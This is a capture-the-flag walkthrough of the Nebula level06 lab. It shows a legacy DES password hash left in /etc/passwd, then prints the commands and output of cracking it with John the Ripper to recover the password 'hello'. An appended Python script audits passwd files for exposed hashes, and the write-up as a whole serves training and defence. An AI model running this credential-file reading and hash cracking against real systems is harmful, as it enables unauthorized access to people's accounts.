"Whatever Pages"

The legacy of unix system

         Nebula 06 Agenda: “The flag06 account credentials came from a legacy unix system.”


If we dig around in flag06’s home directory, we find nothing interesting. However, if we look up the user’s data in “/etc/passwd” (a text file that describes user login accounts for the system), it turns out that flag06’s encrypted password is not stored in “/etc/shadow” (which, unlike passwd, is readable by the superuser only) but directly in the passwd entry:

level06@nebula:/home/flag06$ cat /etc/passwd | grep "flag06"
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

To crack that password hash, let’s use the old-school, popular tool “JTR” (John the Ripper). First, though, we need to install it from the nebula account (the password is the same).

 1 level06@nebula:/home/flag06$ su nebula
 2 Password: 
 3 nebula@nebula:/home/flag06$ sudo apt-get install john
 4 [sudo] password for nebula: 
 5 Reading package lists... Done
 6 .................................................
 7 Setting up john (1.7.8-1) ...
 8 nebula@nebula:/home/flag06$ exit
 9 exit
10 
11 level06@nebula:/home/flag06$ john /etc/passwd
12 Created directory: /home/level06/.john
13 Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
14 hello            (flag06)
15 guesses: 1  time: 0:00:00:00 100% (2)  c/s: 25100  trying: 12345 - biteme
16 Use the "--show" option to display all of the cracked passwords reliably

Success! At line 14 of the above code block, we can see that the flag06 account’s password is “hello”.
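From the defender's side, the root cause here is a password hash left in the world-readable passwd file instead of in shadow. The following is an added example, not part of the original post, that audits passwd-format text for such entries; the function names and every sample entry except the flag06 line are constructed for illustration.

```python
import re

# Constructed sample in /etc/passwd format; only the flag06 line comes from the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
guest::1001:1001::/home/guest:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
svc:$6$constructedsalt$constructedhashvalue:1002:1002::/home/svc:/bin/sh
"""

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")     # 2-char salt + 11-char hash
MODULAR_CRYPT = re.compile(r"^\$[0-9a-zA-Z-]+\$")  # $1$, $5$, $6$, $2b$, ...


def classify_password_field(field):
    """Return (kind, is_finding) for the second field of a passwd entry."""
    if field == "x":
        return "shadowed", False            # real hash lives in /etc/shadow
    if field == "":
        return "empty password", True
    if field.strip("!*") == "":
        return "locked", False              # only lock markers, no hash
    if DES_CRYPT.match(field):
        return "traditional DES crypt hash", True
    if MODULAR_CRYPT.match(field):
        return "modular crypt hash", True
    return "unrecognised value", True       # review by hand


def audit_passwd(text):
    """Return [(user, kind)] for entries exposing password material in passwd."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line[0] in "#+-":    # skip blanks, comments, NIS compat lines
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        kind, is_finding = classify_password_field(parts[1])
        if is_finding:
            findings.append((parts[0], kind))
    return findings


if __name__ == "__main__":
    for user, kind in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {kind} in passwd")
```

On a live system, pass the contents of /etc/passwd to `audit_passwd`; any reported hash should be moved to shadow and the password changed.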